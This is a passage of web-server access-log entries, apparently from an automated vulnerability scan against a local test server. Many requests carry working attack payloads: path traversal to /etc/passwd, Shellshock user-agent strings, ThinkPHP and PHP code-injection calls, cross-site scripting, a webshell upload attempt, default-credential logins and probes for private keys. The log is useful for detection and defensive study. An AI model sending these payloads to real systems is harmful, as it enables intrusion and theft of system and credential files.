/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?s=index/think\x5Capp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /network-login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"{\x22userName\x22:\x22admin\x22,\x22password\x22:\x22cs141-snmp\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libs/dam/merge/metadata.html?path=/etc&.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"more=0&host=0&username=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&password=&db=&lang=en_us&expire=3","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?action=login.index HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%09/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /about_state HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pki/images/keyManager_title.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /autoconfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lucees3ezf%3cimg%20src%3da%20onerror%3dalert('29N5mBqlaZXEDFJ1thHHfgmFTGD')%3elujb7/admin/imgProcess.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /privatekey.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.build.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"step=1&Language=de{${system(\x22ls\x22)}}&NextBtn=Weiter+%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mailingupgrade.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download/C%3a%2fwindows%2fsystem.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WAN_wan.htm?.gif HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"{\x22userName\x22:\x22engineer\x22,\x22password\x22:\x22engineer\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/jarrewrite.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"\x22() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'\x22", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"form_id=user_login&name={{username}}&pass={{password}}&op=Log+in","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?q=user%2Flogin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5C%5Cexample.com/%252e%252e%252f HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wsdl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/autoconfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /explore/snippets HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"{\x22id\x22: 1, \x22method\x22: \x22global.login\x22, \x22params\x22: {\x22authorityType\x22: \x22Default\x22, \x22clientType\x22: \x22NetKeyboard\x22, \x22loginType\x22: \x22Direct\x22, \x22password\x22: \x22Not Used\x22, \x22passwordType\x22: \x22Default\x22, \x22userName\x22: \x22admin\x22}, \x22session\x22: 0}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /RPC2_Login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lucee/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('29N5mBqlaZXEDFJ1thHHfgmFTGD')%3elujb7/admin/imgProcess.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wptouch_switch=desktop&redirect=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.jenkins.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WAN_wan.htm?.gif HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/ContactAdministrators!default.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"{\x22userName\x22:\x22guest\x22,\x22password\x22:\x22guest\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/redirect.php?plugins[]=../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /umbraco HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appliance/login.ns HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /-/snippets HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"--e64bdf16c554bbc109cecef6451c26a4\x0D\x0AContent-Disposition: form-data; name=\x22Filedata\x22; filename=\x2229N5mAecvrmNrJ2QXtraqGaQymx.php\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A--e64bdf16c554bbc109cecef6451c26a4--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /my.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.travis.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_bin/lists.asmx?WSDL HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/slogin/login.py HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"() { :; }; echo ; echo ; /bin/cat /etc/passwd", "http_referer":"-", "request_method":"GET", 